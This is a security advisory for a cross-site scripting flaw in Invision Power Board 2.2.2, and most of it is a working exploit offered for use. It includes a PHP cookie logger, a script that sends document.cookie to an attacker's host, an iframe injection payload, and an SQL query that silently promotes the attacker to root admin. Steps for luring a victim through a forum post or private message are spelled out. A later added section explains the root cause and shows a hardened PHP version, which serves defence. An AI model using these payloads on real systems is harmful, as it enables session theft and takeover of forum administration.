Invision Power Board Cross Site Scripting Vulnerability
------------------------------------------------------------------------
SUMMARY
A cross site scripting vulnerability in Invision Power Board allows remote attackers to make the administrator of the forum, or any other privileged user, execute arbitrary commands (SQL commands) on the attacker's behalf. The following exploit code can be used to test your system for the mentioned vulnerability.
DETAILS
Vulnerable Systems:
* Invision Power Board version 2.2.2
Exploit:
Code:
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
#
#
# Invision Power Board 2.2.2 Cross Site Scripting vulnerability
#
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
#
# Vendor site: http://www.invisionboard.com/
# Vulnerability found by Iron (http://www.ironwarez.info)
#
# Greets to all RootShell Security Group members
#
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
#
# The vulnerability:
# Open up any php file in /jscripts/folder_rte_files
# See:
var editor_id = <?php print '"'.trim($_REQUEST['editorid']).'";'; ?>
#
# $_REQUEST['editorid'] isn't sanitized in any way, so it allows
# other users to execute their own code.
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
#
# PoC (Log cookies & run SQL query)
#
# Requirements: server supporting PHP, user account on
# target forum, database prefix needs to be known.
#
# Create a file called name.php on your webserver and put this code in it:
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
#
<?php
$target = "http://www.yourtarget.com/forum"; #Target forum without trailing slash
$prefix = "ibf_"; #Database prefix, default: ibf_
$member = 22; #Member id to promote
$newgroup = 4; # The id of the new group to promote, normally 4 is root admin
# Record the visiting browser's request details and the cookie passed in ?c=
$ip = $_SERVER['REMOTE_ADDR'];
$referer = $_SERVER['HTTP_REFERER'];
$agent = $_SERVER['HTTP_USER_AGENT'];
$data = $_GET['c'];
$time = date("Y-m-d G:i:s A");
$text = "Time: ".$time."\nIP:".$ip."\nReferer:".$referer."\nUser-Agent:".$agent."\nCookie:".$data."\n\n";
$file = fopen('log.txt' , 'a');
fwrite($file,$text);
fclose($file);
# Only an admin session cookie triggers the SQL query step
if(preg_match("/ipb_admin_session_id=([0-9a-z]{32});/",$data,$stuff))
{
print '<iframe width=0 height=0 src="'.$target.'/admin/index.php?adsess='.$stuff[1].'&act=sql&code=runsql&section=admin&query=UPDATE+'.$prefix.'members+SET+mgroup+%3D+%27'.$newgroup.'%27+WHERE+id+%3D+%27'.$member.'%27&st="></iframe>';
}
?>
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
#
# Also create a file in the same directory named "log.txt" and chmod it 777
#
# Now, create a file called script.js on your webserver, put this code in it:
#
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
#
document.location="http://www.yourownsite.com/path/to/file/name.php?c="+document.cookie;
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
#
#
# And, last but not least, create a file that combines those two ;)
# Name it blah.html and put this code in it:
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
#
<iframe border=0 src="http://www.targetforum.com/forum_folder/jscripts/folder_rte_files/module_table.php?editorid=//--></script><script src=http://www.yourownsite.com/path/to/file/script.js>" width=0 height=0></iframe>
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
#
# Now, post a message on the forum or send a pm to your target with the link to the html page.
# If a normal user views the page, his cookies will be logged, funny.
# If an admin visits the page and he has an admin_session_id cookie set,
# he will add you to the root admin group without even knowing ;).
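The root cause is the unescaped interpolation of $_REQUEST['editorid'] into a JavaScript string literal inside the page. As an added example (not code from the advisory or from Invision Power Board), the vulnerable pattern is shown next to a hardened version; the function names are hypothetical and the identifier alphabet in validate_editor_id is an assumption, since the page gives no specification for editor ids.

```php
<?php
// Added example, not code from the advisory or from Invision Power Board:
// the vulnerable pattern next to a hardened version of the same task,
// emitting a request parameter into an inline <script> block.

// Vulnerable: the raw request value lands inside a JavaScript string
// literal. A quote or a "</script>" in the value ends the literal (or the
// whole script element) and whatever follows is executed by the browser.
function render_editor_id_vulnerable(string $editorid): string
{
    return 'var editor_id = "' . trim($editorid) . '";';
}

// Hardened, step 1: accept only the shape an editor id can take.
// Assumption: ids are short identifiers; the page gives no spec, so
// adjust the alphabet to the real one. Anything else is rejected.
function validate_editor_id(string $editorid): ?string
{
    $editorid = trim($editorid);
    return preg_match('/\A[A-Za-z0-9_]{1,64}\z/', $editorid) === 1 ? $editorid : null;
}

// Hardened, step 2: even the validated value goes through json_encode()
// with the HTML-safe flags, so <, >, &, ' and " become \uXXXX escapes and
// can never close the string literal or the enclosing script element.
function render_editor_id_hardened(string $editorid): string
{
    $id = validate_editor_id($editorid);
    if ($id === null) {
        return 'var editor_id = null;'; // refuse rather than guess
    }
    $flags = JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT;
    return 'var editor_id = ' . json_encode($id, $flags) . ';';
}

// Constructed inputs: a legitimate id and the kind of breakout the
// advisory describes (closing the script element from inside the value).
$good = 'ipb_editor_1';
$bad  = '"; //--></script><script>x()</script>';

echo render_editor_id_vulnerable($bad), PHP_EOL;  // breakout passes through verbatim
echo render_editor_id_hardened($good), PHP_EOL;   // plain id, quoted safely
echo render_editor_id_hardened($bad), PHP_EOL;    // rejected by validation
```

Validation alone is not enough in general, since a later change to the allowed alphabet would silently reopen the hole; the output encoding step is what keeps the script context intact regardless of what the value contains.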
ADDITIONAL INFORMATION
The information has been provided by Iron.
The original article can be found at: http://www.ironwarez.info
Comment: a whole batch of IBP boards is about to get wrecked.